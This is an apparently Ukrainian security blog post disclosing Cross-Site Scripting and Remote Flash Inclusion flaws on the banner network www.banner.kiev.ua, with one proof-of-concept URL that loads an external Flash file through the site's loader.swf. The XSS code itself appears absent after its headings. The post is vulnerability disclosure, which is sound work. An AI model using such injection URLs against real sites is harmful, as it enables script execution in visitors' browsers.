Нові уразливості на www.banner.kiev.ua
15:24 13.08.201022.12.2009
У квітні, 26.04.2009, я знайшов Cross-Site Scripting та Remote Flash Inclusion уразливості на проекті http://www.banner.kiev.ua (банерна мережа UBN). Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про численні уразливості на www.banner.kiev.ua.
Як і у випадку попередніх XSS уразливостей, нова XSS пов’язана з тією самою проблемою, про яку я писав в статті XSS уразливості в 8 мільйонах флеш файлах.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
13.08.2010
XSS:
Код спрацює при кліку. Це Strictly social XSS.
Remote Flash Inclusion:
В старих версіях флеша, де була менш жорстка політика безпеки, можна було просто включити зовнішню флешку і виконати XSS код (він міг бути виконаний автоматично, або при кліку).
http://www.banner.kiev.ua/s/loader.swf?swf=http://websecurity.com.ua/webtools/url.swf
В нових версіях флеша це неможливо, тому окрім самого віддаленого включення флешки (Remote Flash Inclusion), потрібно вказати також код для виконання у відповідному параметрі флешки loader.swf.
XSS: